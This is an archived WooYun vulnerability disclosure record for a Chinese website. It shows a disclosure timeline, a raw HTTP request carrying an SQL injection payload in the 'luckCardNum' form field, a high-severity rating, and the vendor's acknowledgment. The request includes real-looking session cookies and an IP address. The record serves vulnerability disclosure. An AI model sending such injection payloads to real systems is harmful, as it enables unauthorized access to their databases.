WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
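2016-04-08: Details reported to the vendor; awaiting vendor handling
2016-04-11: Vendor confirmed; details disclosed to the vendor only
2016-04-21: Details disclosed to core white hats and experts in related fields
2016-05-01: Details disclosed to regular white hats
2016-05-11: Details disclosed to intern white hats
2016-05-26: Details disclosed to the public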
POST /rewardList.do HTTP/1.1
Content-Length: 717
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_NDMOGETRGT
X-Requested-With: XMLHttpRequest
Referer: http://www.saclub.com.cn/
Cookie: JSESSIONID=nZV3XDkVxsWmrP2QC04Jp1rdTQjYy7Lyp9DsQ8ltjnKqb5G19tJj!15768151; Hm_lvt_6df6f9d56598e7f5e729beb6c4558e60=1459823896,1459823943,1459824204,1459824219; Hm_lpvt_6df6f9d56598e7f5e729beb6c4558e60=1459824219; LiveWSLHG31671888=6359544928882309449790; LiveWSLHG31671888sessionid=6359544928882309449790; fistvisitetime=1459823714543; lastvisitetime=1459824219215; visitecounts=1; visitepages=17; ip=124.114.79.35; ip1=%25u9655%25u897f%25u7701%25u897f%25u5b89%25u5e02; ip2=%25u7535%25u4fe1; BAIDUID=6CC5549320E8DDCEC3A571F32E99F4CB:FG=1; HMACCOUNT=F9BA16831E4645B0; ipfrom=%e9%99%95%e8%a5%bf%e7%9c%81%e8%a5%bf%e5%ae%89%e5%b8%82|%e7%94%b5%e4%bf%a1
Host: www.saclub.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_LCPDVIKIHE

-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="act"


-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="currentPage"

1
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="luckCardNum"

-1' OR 1=1* AND 00062=00062 or '6sY5Lc6x'='
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="luckName"

cmkssgdt
-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="month"


-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="monthId"


-------AcunetixBoundary_LCPDVIKIHE
Content-Disposition: form-data; name="totalPage"

1
-------AcunetixBoundary_LCPDVIKIHE--
70 databases are affected:
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-04-11 16:47
Thank you! We will fix it as soon as possible!
None yet